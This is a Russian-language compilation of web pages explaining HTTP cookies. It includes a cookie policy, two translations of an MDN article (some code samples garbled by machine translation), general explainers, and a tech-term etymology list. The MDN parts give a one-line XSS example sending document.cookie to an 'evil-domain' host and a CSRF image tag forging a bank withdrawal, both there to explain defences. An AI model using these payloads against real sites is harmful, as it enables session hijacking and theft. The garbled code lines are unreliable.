  • Функциональные файлы cookie. Эти файлы cookie служат для того, чтобы опознавать пользователей, возвращающихся на наш сайт. Они позволяют индивидуально подбирать содержание сайта для вас и запоминать ваши предпочтения. Если вы блокируете этот тип файлов, то это может повлиять на производительность и функциональность веб-сайта и может ограничить доступ к контенту на сайте.

Как долго файлы cookie хранятся на устройстве?

Некоторые файлы cookie действуют с момента вашего входа на сайт до конца данной конкретной сессии работы в браузере. При закрытии браузера эти файлы становятся ненужными и автоматически удаляются. Такие файлы cookie называются «сеансовыми».

Некоторые файлы cookie сохраняются на устройстве и в промежутке между сессиями работы в браузере — они не удаляются после закрытия браузера. Такие файлы cookie называются «постоянными». Срок хранения постоянных файлов cookie на устройстве различается для разных файлов cookie.

Кто размещает файлы cookie на моем устройстве?

Файлы cookie могут размещаться на Вашем устройстве администрацией сайта. Эти файлы cookie называются «собственными». Некоторые файлы cookie могут размещаться на Вашем устройстве другими операторами. Такие файлы cookie называются файлами «третьих лиц».

Как управлять файлами cookie?

Большинство интернет-браузеров изначально настроены автоматически принимать cookie. Вы можете изменить настройки таким образом, чтобы блокировать cookie или предупреждать пользователя, когда файлы данного типа будут отправлены на устройство. Есть несколько способов управления cookie. Обратитесь к инструкции вашего браузера для того, чтобы узнать больше о том, как скорректировать или изменить настройки браузера. Если отключить cookie, то это может повлиять на вашу работу в Интернете.

Файлы cookie и персональные данные

Файлы cookie не содержат Ваших персональных данных, благодаря которым возможна идентификация вашей личности. Файлы cookie не содержат фамилии, имени, отчества, адресов электронной почты, домашнего адреса, номеров телефонов и прочих подобных данных.

Куки HTTP — HTTP | MDN

HTTP cookie (web cookie, cookie браузера) — это небольшой фрагмент данных, отправляемый сервером на браузер пользователя, который тот может сохранить и отсылать обратно с новым запросом к данному серверу. Это, в частности, позволяет узнать, с одного ли браузера пришли оба запроса (например, для аутентификации пользователя). Они запоминают информацию о состоянии для протокола HTTP, который сам по себе этого делать не умеет.

Cookie используются, главным образом, для:

⦁    Управления сеансом (логины, корзины для виртуальных покупок)
⦁    Персонализации (пользовательские предпочтения)
⦁    Мониторинга (отслеживания поведения пользователя)

До недавнего времени cookie принято было использовать в качестве хранилища информации на стороне пользователя. Это могло иметь смысл в отсутствии вариантов, но теперь, когда в распоряжении браузеров появились различные API (программные интерфейсы приложения) для хранения данных, это уже не так. Из-за того, что cookie пересылаются с каждым запросом, они могут слишком сильно снижать производительность (особенно в мобильных устройствах). В качестве хранилищ данных на стороне пользователя вместо них можно использовать Web storage API (localStorage and sessionStorage) и IndexedDB.

Чтобы посмотреть сохраненные cookies (и какие еще способы хранения данных использует веб-страница), можно использовать Storage Inspector (Инспектор хранилища) из раздела Developer Tools (Веб-разработка).

Получив HTTP-запрос, вместе с откликом сервер может отправить заголовок  Set-Cookie с ответом. Cookie обычно запоминаются браузером и посылаются в значении заголовка HTTP  Cookie с каждым новым запросом к одному и тому же серверу. Можно задать срок действия cookie, а также срок его жизни, после которого cookie не будет отправляться. Также можно указать  ограничения на путь и домен, то есть указать, в течении какого времени и к какому сайту  оно отсылается.

Заголовки

Set-Cookie и Cookie

Заголовок Set-Cookie  HTTP-отклика используется для отправки cookie с сервера на клиентское приложение (браузер). Простой cookie может задаваться так:

Set-Cookie: <имя-cookie>=<заголовок-cookie>

Этот заголовок с сервера дает клиенту указание сохранить cookie (это делают, например, PHP, Node. js, Python и Ruby on Rails). Отклик, отправляемый браузеру, содержит заголовок Set-Cookie, и cookie запоминается браузером.

HTTP/1.0 200 OK
Content-type: text/html
Set-Cookie: yummy_cookie=choco
Set-Cookie: tasty_cookie=strawberry

[page content]

Теперь, с каждым новым запросом к серверу, при помощи заголовка Cookie браузер будет возвращать серверу все сохраненные ранее cookies. 

GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: yummy_cookie=choco; tasty_cookie=strawberry

Сессионные cookie

Простой cookie, пример которого приведен выше, представляет собой сессионный cookie (session cookie) — такие cookie удаляются при закрытии клиента, то есть существуют только на протяжении текущего сеанса, поскольку атрибуты Expires или  Max-Age для него не задаются. Однако, если в браузере включено автоматическое восстановление сеанса, что случается очень часто, cookie сеанса может храниться постоянно, как если бы браузер никогда не закрывался.

Постоянные cookies

Постоянные cookie ( permanent cookies) удаляются не с закрытием клиента, а при наступлении определенной даты (атрибут Expires) или после определенного интервала времени (атрибут Max-Age).

Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT;

Secure

("безопасные") и HttpOnly cookies

«Безопасные» (secure) cookie отсылаются на сервер только если запрос выполняется по протоколу SSL и HTTPS. Однако важные данные никогда не следует передавать или хранить в cookies, поскольку сам их механизм весьма уязвим в отношении безопасности, а флаг secure никакого дополнительного шифрования или средств защиты не обеспечивает. Начиная с Chrome 52 и Firefox 52, незащищенные сайты (http:) не могут создавать куки с флагом secure.

Куки HTTPonly не доступны из JavaScript через свойства Document. cookie API, что помогает избежать межсайтового скриптинга (XSS). Устанавливайте этот флаг для тех cookie, к которым не требуется обращаться через JavaScript. В частности, если куки используются только для поддержки сеанса, то в JavaScript они не нужны, так что в этом случае следует устанавливать флаг HttpOnly.

Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly

Область видимости куков

Директивы Domain  и Path определяют область видимости куки, то есть те URL’ы, к которым куки могут отсылаться.
Атрибут Domain указывает хосты, на которые отсылаются куки. Если он не задан, то по умолчанию берется доменная часть адреса документа (но без поддоменов).  Если домен указан явно, то поддомены всегда включены.

Например, если задано Domain=mozilla.org, то куки включены и в поддоменах, например, в developer.mozilla.org.

Атрибут Path указывает URL, который должен быть в запрашиваемом ресурсе на момент отправки заголовка Cookie.  Символ %x2F («/») интерпретируется как разделитель разделов, подразделы также включаются.

Если задано Path=/docs, то подходят и такие пути, как:

  • «/docs»,
  • «/docs/Web/»,
  • «/docs/Web/HTTP»

Куки

SameSite Это экспериментальное API, которое не должно использоваться в рабочем коде.

Куки SameSite позволяют серверам декларировать, что куки не должны отсылаться с межсайтовыми запросами, что в некотором роде обеспечивает защиту от межсайтовых подделок запроса (CSRF). Куки SameSite находятся пока в стадии эксперимента и поддерживаются не всеми браузерами.

Доступ из JavaScript посредством

Document.cookie

Куки можно создавать через JavaScript при помощи свойства Document.cookie. Если флаг HttpOnly не установлен, то и доступ к существующим cookies можно получить через JavaScript.

document. cookie = "yummy_cookie=choco";
document.cookie = "tasty_cookie=strawberry";
console.log(document.cookie);

Учитывайте, пожалуйста, вытекающие из этого проблемы в отношении безопасности, подчеркнутые ниже (раздел Security). Куки, доступные для JavaScript, могут быть похищены посредством XSS.

Важная информация никогда не должна храниться или передаваться в куках HTTP, поскольку этот механизм сам по себе небезопасен.

Захват сессии (session hijacking) и XSS

Куки часто используются в веб-приложениях для идентификации пользователя и сеанса работы, в котором он прошел процедуру аутентификации. Соответственно, похищение куков из приложения может привести к захвату авторизованного сеанса пользователя. Кража куков часто осуществляется посредством социальной инженерии (Social Engineering) и использования уязвимости приложения для XSS.

(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;

Атрибут HttpOnly помогает понизить эту угрозу, перекрывая доступ к кукам из JavaScript..

Межсайтовая подделка запроса (CSRF — Cross-site request forgery)

В Wikipedia приведен хороший пример CSRF. В сообщение (например, в чате или на форуме) включают (якобы) изображение, которое, на самом деле, представляет собой запрос к банковскому серверу на снятие денег:

<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">

Теперь, если вы зашли в свой банковский аккаунт, а куки по-прежнему действительны (и никакой дополнительной проверки не требуется), то при загрузке HTML-документа с этим изображением деньги будут переведены с вашего счета. Для защиты от этого используется ряд методов:

  • Как и при XSS, важна фильтрация входящей информации.
  • Для любой важной операции должно запрашиваться подтверждение.
  • Куки, используемые для ответственных операций, должны иметь короткий срок действия.
  • Дополнительную информацию можно получить в пользовательской инструкции по предотвращению OWASP CSRF.

Сторонние (Third-party) куки

Куки связаны с определенным доменом. Если он совпадает с доменом страницы, на которой вы находитесь, то их называют «куками первого лица» (first-party cookies). Если это другой домен, их называют «сторонними куками» (third-party cookies). Куки первого лица отсылаются только на тот сервер, который их создал. Однако, страница может содержать изображения или другие компоненты (например, рекламные баннеры), хранящиеся на других серверах. Куки, посылаемые через такие компоненты, используются, главным образом, в рекламных целях или для отслеживания информации в сети. В качестве примера можно рассмотреть типы файлов cookie, используемые Google. Большинство браузеров по умолчанию разрешают использование сторонних куков, но есть расширения, позволяющие их блокировать (например, Privacy Badger от EFF).

Если вы не сообщите об использовании сторонних куков, а пользователь обнаружит их самостоятельно, то доверие к вам может пошатнуться. Чтобы избежать этого, лучше предоставлять соответствующую информацию. В некоторых странах использование куков регламентируется законодательством. Прочитать об этом можно, например, в Википедии в разделе cookie statement (создание куков).

Не отслеживать (Do-Not-Track)

Для запрета на отслеживание со стороны приложения, или межсайтового отслеживания, можно использовать заголовок DNT, хотя технических или законодательных требований на этот счет нет. Подробнее об этом рассказывается в разделе заголовок DNT.

Директива Евросоюза о куках

Правила по использованию куков в Евросоюзе (ЕС) определены в Директиве 2009/136/EC Европарламента (Directive 2009/136/EC), вступившей в действие 25 мая 2011. Это не закон, как таковой, а рекомендация странам-членам ЕС принять законы, соответствующие её требованиям. В каждой стране на этот счет могут быть свои законы.

Согласно этой директиве для хранения или извлечения информации с компьютера пользователя требуется проинформировать его и получить соответствующее разрешение. С момента её появления многие сайты добавили баннеры, информирующие пользователя об использовании куков.

Подробнее об этом можно прочитать в соответствующем разделе Википедии (Wikipedia). За наиболее полной и точной информацией обращайтесь к законодательствам конкретных стран.

Куки-зомби и «вечные» куки

Более радикальный подход к кукам представляют собой куки-зомби, или «вечные» куки, которые восстанавливаются после удаления, и полное удаление которых умышленно затруднено. Они используют прикладные интерфейсы веб-хранилищ (Web storage API), Flash Local Shared Objects и другие методы собственного воссоздания в случае, если обнаружено их отсутствие.

Что такое файлы cookie?

Этот контент был заархивирован и больше не поддерживается Университетом Индианы. Информация здесь может быть неточной, а ссылки могут быть недоступны или надежны.

Файлы cookie — это сообщения, которые веб-серверы передают вашему веб-браузеру, когда вы посещаете Интернет-сайты. Ваш браузер сохраняет каждое сообщение в небольшом файле с именем cookie.txt . Когда вы запрашиваете другую страницу с сервера, ваш браузер отправляет cookie обратно на сервер. Эти файлы обычно содержат информацию о вашем посещении веб-страницы, а также любую информацию, которую вы добровольно предоставили, например, ваше имя и интересы.

Термин «cookie» — это намек на программу Unix под названием Fortune Cookie, которая при каждом запуске создает новое сообщение или удачу.

Примеры файлов cookie

Файлы cookie чаще всего используются для отслеживания активности на сайте. Когда вы посещаете некоторые сайты, сервер выдает вам файл cookie, который действует как ваша идентификационная карта. При каждом повторном посещении этого сайта ваш браузер передает этот файл cookie обратно на сервер. Таким образом, веб-сервер может собирать информацию о том, какие веб-страницы используются чаще всего и какие страницы собирают больше всего повторных обращений.

Файлы cookie также используются для покупок в Интернете. Интернет-магазины часто используют файлы cookie, которые записывают любую личную информацию, которую вы вводите, а также любые товары в вашей электронной корзине покупок, поэтому вам не нужно повторно вводить эту информацию каждый раз, когда вы посещаете сайт.

Серверы могут использовать файлы cookie для предоставления персонализированных веб-страниц. Когда вы выбираете предпочтения на сайте, который использует эту опцию, сервер помещает информацию в куки. Когда вы вернетесь, сервер использует информацию из файла cookie, чтобы создать для вас персонализированную страницу.

Проблемы безопасности

Только веб-сайт, который создает файл cookie, может его прочитать, поэтому другие серверы не имеют доступа к вашей информации. Кроме того, веб-серверы могут использовать только информацию, которую вы предоставляете, или выбор, который вы делаете при посещении веб-сайта, в качестве содержимого в файлах cookie.

Веб-мастера всегда могли отслеживать доступ к своим сайтам, но файлы cookie упрощают это. В некоторых случаях файлы cookie поступают не с сайта, который вы посещаете, а от рекламных компаний, которые управляют рекламными баннерами для набора сайтов (например, DoubleClick.com). Эти рекламные компании могут разработать подробные профили людей, которые выбирают рекламу на сайтах своих клиентов.

Принятие cookie не дает серверу доступа к вашему компьютеру или какой-либо вашей личной информации (за исключением любой информации, которую вы могли преднамеренно предоставить, как при покупках в Интернете). Кроме того, невозможно выполнить код из файла cookie и невозможно использовать файл cookie для доставки вируса.

Просмотр и управление файлами cookie

По соображениям конфиденциальности вы можете просмотреть файлы cookie, которые в настоящее время хранятся в вашем браузере, или указать, с каких сайтов вы принимаете файлы cookie. Вы также можете решить, как долго они могут храниться и использоваться. Большинство современных браузеров предлагают возможность управлять настройками файлов cookie; обратитесь к файлам справки вашего браузера и посмотрите:

Подробнее

См .:

Использование файлов cookie HTTP — HTTP

HTTP-файл cookie (веб-файл cookie, файл cookie браузера) — это небольшой фрагмент данных, который сервер отправляет в веб-браузер пользователя. Браузер может сохранить его и отправить обратно с более поздними запросами на тот же сервер. Как правило, он используется, чтобы определить, поступили ли два запроса из одного и того же браузера — например, чтобы пользователь оставался в системе.Он запоминает информацию о состоянии для протокола HTTP без сохранения состояния.

Файлы cookie в основном используются для трех целей:

Управление сеансом
Логины, тележки для покупок, результаты игр или что-то еще, что сервер должен запомнить
Персонализация
Пользовательские настройки, темы и другие настройки
Отслеживание
Запись и анализ поведения пользователя

Файлы cookie когда-то использовались для общего хранения на стороне клиента.Хотя это было законно, когда они были единственным способом хранить данные на клиенте, теперь рекомендуется использовать современные API-интерфейсы хранилища. Файлы cookie отправляются с каждым запросом, поэтому они могут ухудшить производительность (особенно для мобильных подключений для передачи данных). Современные API для клиентского хранилища — это API веб-хранилища ( localStorage и sessionStorage ) и IndexedDB.

Чтобы просмотреть сохраненные файлы cookie (и другое хранилище, которое может использовать веб-страница), вы можете включить инспектор хранилища в инструментах разработчика и выбрать файлы cookie в дереве хранилища.

После получения HTTP-запроса сервер может отправить один или несколько заголовков Set-Cookie с ответом. Файл cookie обычно хранится в браузере, а затем файл cookie отправляется с запросами на тот же сервер внутри HTTP-заголовка Cookie . Можно указать дату истечения срока или продолжительность, после которой cookie больше не отправляется. Могут быть установлены дополнительные ограничения для определенного домена и пути, ограничивающие отправку файла cookie. Дополнительные сведения об атрибутах заголовка, упомянутых ниже, см. В справочной статье Set-Cookie .

Заголовки

Set-Cookie и Cookie

HTTP-заголовок ответа Set-Cookie отправляет файлы cookie с сервера пользовательскому агенту. Простой файл cookie устанавливается так:

  Set-Cookie:  =   

Это показывает, что сервер отправляет заголовки, чтобы сказать клиенту сохранить пару файлов cookie:

 HTTP / 2.0 200 ОК
Тип содержимого: текст / html
Set-Cookie: yummy_cookie = choco
Set-Cookie: вкусно_cookie = клубника

[содержание страницы] 

Затем при каждом последующем запросе к серверу браузер отправляет обратно все ранее сохраненные файлы cookie на сервер, используя заголовок Cookie .

 GET /sample_page.html HTTP / 2.0
Хост: www.example.org
Cookie: yummy_cookie = choco; вкусно_cookie = клубника 
Примечание: Вот как использовать заголовок Set-Cookie в различных серверных приложениях:

Определить время жизни файла cookie

Время жизни файла cookie можно определить двумя способами:

  • Сеанс Файлы cookie удаляются по окончании текущего сеанса. Браузер определяет, когда заканчивается «текущий сеанс», и некоторые браузеры используют сеанс , восстанавливая при перезапуске, что может привести к тому, что файлы cookie сеанса будут длиться бесконечно долго.
  • Постоянные файлы cookie удаляются в дату, указанную атрибутом Expires , или по истечении периода времени, указанного в атрибуте Max-Age .

Например:

 Set-Cookie: id = a3fWa; Срок действия истекает = Thu, 31 Oct 2021 07:28:00 GMT; 

Примечание : Когда устанавливается дата Expires , время и дата устанавливаются относительно клиента, на котором устанавливается cookie, а не сервера.

Если ваш сайт аутентифицирует пользователей, он должен повторно создавать и повторно отправлять файлы cookie сеанса, даже те, которые уже существуют, всякий раз, когда пользователь аутентифицируется.Этот метод помогает предотвратить атаки фиксации сеанса, когда третья сторона может повторно использовать сеанс пользователя.

Ограничить доступ к файлам cookie

Существует несколько способов гарантировать, что файлы cookie отправляются безопасно и не доступны для посторонних лиц или сценариев: атрибут Secure и атрибут HttpOnly .

Файл cookie с атрибутом Secure отправляется на сервер только с зашифрованным запросом по протоколу HTTPS, а не с незащищенным HTTP (кроме локального хоста), и поэтому к нему не может легко получить доступ злоумышленник. средний нападающий.Небезопасные сайты (с http: в URL-адресе) не могут устанавливать файлы cookie с атрибутом Secure . Однако не следует полагать, что Secure предотвращает любой доступ к конфиденциальной информации в файлах cookie; например, он может быть прочитан и изменен кем-то, у кого есть доступ к жесткому диску клиента (или JavaScript, если атрибут HttpOnly не установлен).

Файл cookie с атрибутом HttpOnly недоступен для API JavaScript Document.cookie ; он отправляется только на сервер.Например, файлы cookie, которые сохраняют сеансы на стороне сервера, не должны быть доступны для JavaScript и должны иметь атрибут HttpOnly . Эта мера предосторожности помогает смягчить атаки с использованием межсайтовых сценариев (XSS).

Вот пример:

 Set-Cookie: id = a3fWa; Срок действия истекает = Thu, 21 Oct 2021 07:28:00 GMT; Безопасный; HttpOnly 

Определите, куда будут отправляться файлы cookie.

Атрибуты Домен и Путь определяют область файла cookie: на какие URL-адреса должны быть отправлены файлы cookie.

Атрибут домена

Атрибут домена указывает, каким хостам разрешено получать cookie. Если не указано, по умолчанию используется тот же хост, который установил cookie, , исключая поддомены . Если указан домен , то поддомены всегда включаются. Следовательно, указание домена менее ограничительно, чем его пропуск. Однако это может быть полезно, когда поддоменам необходимо обмениваться информацией о пользователе.

Например, если Domain = mozilla.org , тогда файлы cookie будут доступны на таких поддоменах, как developer.mozilla.org .

Атрибут пути

Атрибут Path указывает путь URL-адреса, который должен существовать в запрошенном URL-адресе для отправки заголовка Cookie . Символ % x2F («/») считается разделителем каталогов, и подкаталоги также совпадают.

Например, если задано Path = / docs , эти пути совпадают:

  • / документы
  • / docs / Web /
  • / docs / Web / HTTP
Атрибут SameSite

Атрибут SameSite позволяет серверам указывать, будут ли отправляться файлы cookie с запросами из разных источников (где сайт определяется регистрируемым доменом), что обеспечивает некоторую защиту от атак с подделкой запросов между сайтами (CSRF).

Принимает три возможных значения: Strict , Lax и None . С Strict cookie отправляется только на тот же сайт, что и тот, с которого он был создан; Lax аналогичен, за исключением того, что файлы cookie отправляются, когда пользователь переходит на сайт , на котором был создан файл cookie, например, переходя по ссылке с внешнего сайта; Нет указывает, что файлы cookie отправляются как при исходящих, так и межсайтовых запросах, но только в безопасных контекстах (т. е. если SameSite = None , тогда также должен быть установлен атрибут Secure ). Если атрибут SameSite не установлен, то файл cookie рассматривается как Lax .

Вот пример:

 Set-Cookie: mykey = myvalue; SameSite = Строгий 

Стандарт, относящийся к SameSite , недавно был изменен (MDN документирует новое поведение выше). Информацию о том, как атрибут обрабатывается в определенных версиях браузера, см. В таблице совместимости браузера с файлами cookie:

  • SameSite = Lax — новое значение по умолчанию, если SameSite не указан.Ранее по умолчанию для всех запросов отправлялись файлы cookie.
  • Файлы cookie с SameSite = None теперь также должны указывать атрибут Secure (для них требуется безопасный контекст).
Префиксы файлов cookie

Конструкция механизма cookie такова, что сервер не может подтвердить, что cookie был установлен в безопасном источнике, или даже сообщить , где cookie был первоначально установлен.

Уязвимое приложение в субдомене может установить cookie с атрибутом Domain , который дает доступ к этому cookie во всех других субдоменах.Этим механизмом можно злоупотребить в атаке с фиксацией сеанса . Смотрите фиксацию сеанса для основных методов смягчения.

В качестве меры глубокой защиты, однако, можно использовать префиксы файлов cookie для утверждения конкретных фактов о файлах cookie. Доступны два префикса:

__Хост-
Если имя файла cookie имеет этот префикс, он принимается в заголовке Set-Cookie только в том случае, если он также отмечен атрибутом Secure , был отправлен из безопасного источника, не включает ли атрибут Domain , и для атрибута Path установлено значение /. Таким образом, эти файлы cookie можно рассматривать как «заблокированные для домена».
__Secure-
Если имя файла cookie имеет этот префикс, он принимается в заголовке Set-Cookie , только если он помечен атрибутом Secure и был отправлен из безопасного источника. Это слабее, чем префикс __Host- .

Файлы cookie с этими префиксами, которые не соответствуют их ограничениям, отклоняются браузером. Обратите внимание, что это гарантирует, что если субдомен будет создавать файл cookie с префиксом, он будет либо ограничен субдоменом, либо полностью проигнорирован.Поскольку сервер приложений проверяет конкретное имя файла cookie только при определении, аутентифицирован ли пользователь или верен ли токен CSRF, это эффективно действует как мера защиты от фиксации сеанса.

На сервере приложений веб-приложение должно проверять полное имя файла cookie, включая префикс — пользовательские агенты не удаляют префикс из файла cookie перед отправкой его в заголовке Cookie запроса.

Дополнительные сведения о префиксах файлов cookie и текущем состоянии поддержки браузером см. В разделе «Префиксы» справочной статьи Set-Cookie.

Доступ к JavaScript с использованием Document.cookie

Новые файлы cookie могут быть созданы с помощью JavaScript с использованием свойства Document.cookie , а существующие файлы cookie также могут быть доступны из JavaScript, если не установлен флаг HttpOnly .

  document.cookie = "yummy_cookie = choco";
document.cookie = "вкусное_cookie = клубника";
console.log (document.cookie);
  

Файлы cookie, созданные с помощью JavaScript, не могут содержать флаг HttpOnly .

Обратите внимание на вопросы безопасности в разделе «Безопасность» ниже. Файлы cookie, доступные для JavaScript, могут быть украдены через XSS.

Информация должна храниться в файлах cookie с учетом того, что все значения файлов cookie видны и могут быть изменены конечным пользователем. В зависимости от приложения может быть желательно использовать непрозрачный идентификатор, который ищет сервер, или исследовать альтернативные механизмы аутентификации / конфиденциальности, такие как веб-токены JSON.

Способы смягчения атак с использованием файлов cookie:

  • Используйте атрибут HttpOnly для предотвращения доступа к значениям файлов cookie через JavaScript.
  • Файлы cookie, которые используются для конфиденциальной информации (например, с указанием аутентификации), должны иметь короткий срок жизни, при этом для атрибута SameSite установлено значение Strict или Lax . (См. Файлы cookie SameSite выше.) В браузерах, поддерживающих SameSite, это гарантирует, что cookie проверки подлинности не будет отправляться с межсайтовыми запросами, поэтому такой запрос фактически не аутентифицируется для сервера приложений.

Сторонние файлы cookie

Файл cookie связан с доменом.Если этот домен совпадает с доменом страницы, на которой вы находитесь, файл cookie называется основным файлом cookie . Если домен другой, это сторонний файл cookie . Хотя сервер, на котором размещена веб-страница, устанавливает собственные файлы cookie, страница может содержать изображения или другие компоненты, хранящиеся на серверах в других доменах (например, рекламные баннеры), которые могут устанавливать сторонние файлы cookie. В основном они используются для рекламы и отслеживания в Интернете. См., Например, типы файлов cookie, используемых Google.

Сторонний сервер может создать профиль истории просмотров и привычек пользователя на основе файлов cookie, отправленных ему одним и тем же браузером при доступе к нескольким сайтам. Firefox по умолчанию блокирует сторонние файлы cookie, которые, как известно, содержат трекеры. Сторонние файлы cookie (или просто файлы cookie отслеживания) также могут быть заблокированы другими настройками или расширениями браузера. Блокировка файлов cookie может привести к тому, что некоторые сторонние компоненты (например, виджеты социальных сетей) не будут работать должным образом.

Серверы

могут (и должны) установить атрибут cookie SameSite, чтобы указать, можно ли отправлять файлы cookie на сторонние сайты.

Правила, касающиеся файлов cookie

Законодательные или нормативные акты, регулирующие использование файлов cookie, включают:

  • Общие правила конфиденциальности данных (GDPR) в Европейском Союзе
  • Директива о конфиденциальности в ЕС
  • Закон Калифорнии о конфиденциальности потребителей

Эти правила имеют глобальный охват, поскольку они применяются к любому сайту в сети World Wide , к которому получают доступ пользователи из этих юрисдикций (ЕС и Калифорния, с оговоркой, что закон Калифорнии применяется только к организациям с валовой выручкой более 25 миллионов долларов США, среди прочего.)

Эти правила включают такие требования, как:

  • Уведомление пользователей о том, что ваш сайт использует файлы cookie.
  • Разрешить пользователям отказаться от получения некоторых или всех файлов cookie.
  • Разрешить пользователям использовать большую часть вашего сервиса без получения файлов cookie.

Могут существовать другие правила, регулирующие использование файлов cookie в вашем регионе. Вы должны знать и соблюдать эти правила. Есть компании, которые предлагают код «баннера cookie», который помогает вам соблюдать эти правила.

Другой подход к хранению данных в браузере — это API веб-хранилища. Свойства window.sessionStorage и window.localStorage соответствуют сессионным и постоянным куки-файлам по продолжительности, но имеют большие пределы хранения, чем куки-файлы, и никогда не отправляются на сервер. Более структурированные и большие объемы данных можно хранить с помощью API IndexedDB или библиотеки, построенной на нем.

Были созданы другие методы, позволяющие воссоздавать файлы cookie после их удаления, известные как «зомби-файлы cookie». Эти методы нарушают принципы конфиденциальности и контроля пользователей, могут нарушать правила конфиденциальности данных и могут подвергнуть веб-сайт, использующий их, юридической ответственности.

Включены ли файлы cookie? — WhatIsMyBrowser.com

JavaScript не включен.

Необходимо включить JavaScript, чтобы определять, разрешены ли файлы cookie.

Эта страница сообщает вам, разрешены ли файлы cookie в вашем текущем веб-браузере.

У вас включены файлы cookie.Помните; ваша настройка файлов cookie — это настройка «для каждого браузера»; поэтому они включены в Firefox, но они могут быть по-прежнему отключены в другом веб-браузере на вашем компьютере ( … если у вас установлено несколько веб-браузеров! )

Теперь проверьте: Включены ли в моем браузере сторонние файлы cookie?

Что такое файлы cookie?

Файлы cookie — это небольшие фрагменты информации, которые веб-сайты сохраняют на вашем компьютере, когда вы их посещаете. Веб-сайт может использовать файл cookie для хранения факта, что вы вошли на его веб-сайт; таким образом, когда вы вернетесь, вам не нужно будет снова входить в систему.Если это веб-сайт электронной коммерции, на нем может быть сохранена ваша предпочтительная валюта. Файлы cookie содержат только ту информацию, которую вы или сам веб-сайт предоставляете. Файлы cookie не позволяют веб-сайтам получать дополнительный доступ к вашим файлам или личной информации, кроме того, который вы им предоставляете.

Как веб-сайты используют файлы cookie?

Веб-сайт покупок в Интернете может использовать файлы cookie для отслеживания всех продуктов, которые вы добавили в их корзину. Если вы входите на веб-сайт, он может создать файл cookie, чтобы запомнить время, когда вы вошли в систему.

Какие веб-сайты могут читать мои файлы cookie?

Только веб-сайт, установивший файл cookie, может читать этот файл cookie. Другими словами, один веб-сайт не может считывать файлы cookie с другого веб-сайта.

Почему некоторых людей беспокоит принятие файлов cookie?

За вашим поведением всегда можно было следить в Интернете; файлы cookie просто упрощают работу.

Некоторые рекламные сети устанавливают cookie, когда вы просматриваете одну из их рекламных объявлений на веб-сайте.Когда вы переходите на совершенно другой веб-сайт, но просматриваете другую рекламу из той же рекламной сети, они смогут прочитать этот файл cookie и понять, что один и тот же человек только что просмотрел оба веб-сайта. Используя эту технику, они могут создать профиль вас и всех веб-сайтов, которые вы хотите посещать, а также того, как долго вы на них остаетесь, в какое время вы посещаете и так далее.

Именно по этой причине многие люди хотят регулярно очищать файлы cookie своего веб-браузера. Whatismybrowser.com есть список руководств, которые помогут вам включить, отключить и очистить файлы cookie.

Безопасны ли файлы cookie?

В конечном счете, вы должны помнить, что именно то, как веб-сайт, который вы посещаете, использует файлы cookie, определяет их безопасность. По большей части файлы cookie — это безопасная и необходимая часть использования Интернета. Многие веб-сайты не будут работать должным образом, если у вас не включены файлы cookie.

Файлы cookie

(в частности, сторонние файлы cookie) могут использоваться для отслеживания вашего поведения на разных веб-сайтах (например, рекламодатели создают профиль вашей активности с течением времени).

Если вас беспокоит безопасность файлов cookie, вы можете отключить файлы cookie и попробовать поискать в Интернете. Обратите внимание, есть ли у вас разный опыт работы с веб-сайтами, которые вы посещаете. Если из-за этого вы не можете получить доступ к определенным веб-сайтам, подумайте о том, чтобы снова их включить. Если нет, не стесняйтесь оставлять куки-файлы отключенными!

Если вы хотите иметь полный контроль над тем, какие веб-сайты размещают файлы cookie на вашем компьютере, вы можете установить расширение в некоторые веб-браузеры (например, Chrome или Firefox), которые помогут вам управлять ими.

Вообще говоря, у меня включены файлы cookie в моем веб-браузере, и я советую своим клиентам, друзьям и родственникам также оставить их включенными.

Теперь проверьте: Включены ли в моем браузере сторонние файлы cookie?

Еще вопросы?

Если у вас есть еще вопросы, используйте контактную форму, и мы ответим на них и добавим ваш вопрос сюда.

Почему файлы cookie в Интернете называются файлами cookie?

Вы когда-нибудь задумывались, почему файлы cookie в Интернете называются файлами cookie или спам в электронной почте называется спамом? В Интернете есть много странных и замечательных терминов, чтобы называть вещи, но задумывались ли вы, откуда пришли эти термины и откуда они взялись? Итак, мы решили взглянуть на некоторые общие термины и на то, откуда взялась их концепция.

Хлебные крошки: Вы часто видите списки хлебных крошек навигации на торговых сайтах. Где вы проходите через разные варианты, но это оставляет след, поэтому вы можете легко вернуться. Это произошло из детского рассказа Гензель и Гретель , где они оставляют физические крошки хлеба, чтобы найти дорогу обратно.

Ошибка: Когда что-то идет не так в Интернете, это обычно описывается как ошибка. Этот термин произошел от реальной ошибки, мотылька, застрявшего в компьютере в вычислительной лаборатории Гарвардского факультета, который вызывал проблемы, когда он был выпущен, проблема была решена.

Cookie: небольшой фрагмент информации, который передается из браузера на веб-сервер. Он был образован от термина «волшебное печенье», которое происходит от печенья с предсказанием; cookie со встроенным сообщением.

Java: язык программирования. Происхождение названия произошло из списка предложений, и выбирайте его в первую очередь потому, что это популярный жаргонный термин для кофе, который выращивают на острове Ява. Поскольку программисты пили много кофе, это название показалось подходящим!

Mac (Macintosh): компьютер от Apple, созданный на основе популярного типа яблока; Макинтош.

Ботан: разговорный термин для компьютерного человека. Первоначальное написание было «Knurd», но произношение осталось прежним. Этот термин пришел из Политехнического института Ренсселера еще в 1940-х годах, где студентов, которые тусовались и не учились, называли «пьяницами». В то время как студентов, которые поступали наоборот и учились, называли «Knurds», что означает «пьяный», написанное наоборот. Позднее написание изменилось, и оно приобрело популярность благодаря использованию в книге доктора Сьюза и в телешоу Happy Days .

Pac-Man: Название популярной аркадной видеоигры происходит от термина «paku paku», что в переводе с японского означает «шумное переедание», например «chomp chomp». Игра была выпущена в Японии под названием Puck-Man, но когда она была выпущена в США, название было изменено на Pac-Man, опасаясь, что дети могут испортить аркадную игру и изменить P на и F.

Спам: нежелательные сообщения, которые вы получаете в свой почтовый ящик, полученные из эскиза Monty Python SPAM. Скетч установлен в кафе, где в меню есть спам со всем, в то время как покупатель пытается заказать что-то, что не содержит спама.Вы можете посмеяться и проверить это ниже:

Что такое файлы cookie на компьютере?

